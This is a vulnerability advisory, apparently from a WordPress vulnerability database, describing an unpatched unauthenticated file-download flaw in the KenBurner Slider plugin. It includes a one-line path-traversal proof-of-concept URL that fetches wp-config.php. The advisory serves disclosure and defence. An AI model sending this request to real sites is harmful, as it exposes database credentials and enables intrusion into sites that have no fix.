KenBurner Slider - Unauthenticated Arbitrary File Download



Description
The WordPress Plugin called KenBurner Slider suffers from Arbitrary File Download Vulnerability, which could allow an attacker to download the wp-config.php file and others.

This issue has been spotted being exploited in the wild.
Proof of Concept
http://www.example.com/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php

Affects Plugin

no known fix

References

PacketStorm 127987
URL https://twitter.com/Random_Robbie/status/1230173738827702272

Classification

Type LFI
OWASP Top 10 A1: Injection
CWE CWE-22

Miscellaneous

Views 1170
Verified No
WPVDB ID 10079

Timeline

Publicly Published 2014-08-24 (almost 6 years ago)
Added 2020-02-20 (5 months ago)
Last Updated 2020-02-21 (5 months ago)

Our Other Services

Online WordPress Vulnerability Scanner WPScan WordPress Security Plugin